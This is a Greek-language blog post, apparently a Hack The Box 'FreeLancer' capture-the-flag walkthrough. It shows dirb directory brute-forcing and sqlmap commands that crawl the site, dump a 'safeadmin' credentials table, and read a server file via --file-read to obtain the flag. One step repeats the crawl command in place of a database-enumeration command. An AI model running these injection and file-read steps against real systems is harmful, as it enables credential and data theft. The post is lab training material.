Post

FreeLancer

dictionary attack

Τρέχουμε dirb ώστε να αποτκήσουμε όσο το δυνατόν περισσότερα στοιχεία για τον στόχο μας. Από το dirb βλέπουμε το παρακάτω url http://docker.hackthebox.eu:31317/administrat/

Desktop View

SqlInjection

Έπειτα θα τρέξουμε τρέξουμε το sqlmap.

  1. Πρώτα θα κάνουμε crawl.
    1
    
    sqlmap -u  http://docker.hackthebox.eu:31625/ --crawl=2
    

    μας φέρνει το εξής url http://docker.hackthebox.eu:31625/portfolio.php?id=1

Desktop View

  1. Μετά θα τρέξουμετο sqlmap πάλι ώστε να βρούμε τις databases.
    1
    
    sqlmap -u  http://docker.hackthebox.eu:31625/ --crawl=2
    

Desktop View

Αφού βρίκαμε το table safeadmin που ανηκει στην βαση freelancer θα το τεστάρουμε να δούμε για πιθανούς χρήστες.

1
sqlmap -u http://docker.hackthebox.eu:31625/portfolio.php?id=1/ -T safeadmin --dump

οπως προκύπτει και απο την παρακάτω εικόνα πήραμε το όνομα χρήστη και έναν κρυπτογραφημένο κωδικό!! Desktop View

Μέχρι στιγμής τρέξαμε sqlmap για να βρουμε χρήστη και κωδικο ωστε να μπορεσουμε να το χρησιμοποιησουμε στο url που βρίκαμε μέσω του dirb

Λίγο πιο δυσκολα μετά..

Μετά απο πολλες δοκιμασίες η λύση ήταν να ξανατρέξουμε το dirb στο directory administrat το οποιο μας έφερε το panel.php

1
dirb "http://docker.hackthebox.eu:31762/administrat/" -X.php

Desktop View

Επειτα ξέροντας οτι το default directory των αρχείων είναι το /var/www/html τρέχοντας ξανα mysql κατεβάζουμε το αρχειο panel.php

1
sqlmap -u http://docker.hackthebox.eu:31762/portfolio.php?id=1 --file-read=/var/www/html/administrat/panel.php

Desktop View

1
cat cat '/home/kali/.local/share/sqlmap/output/docker.hackthebox.eu'

Desktop View και βλέποντας μέσα στο αρχέιο μας δείνει το flag!!!

This post is licensed under CC BY 4.0 by the author.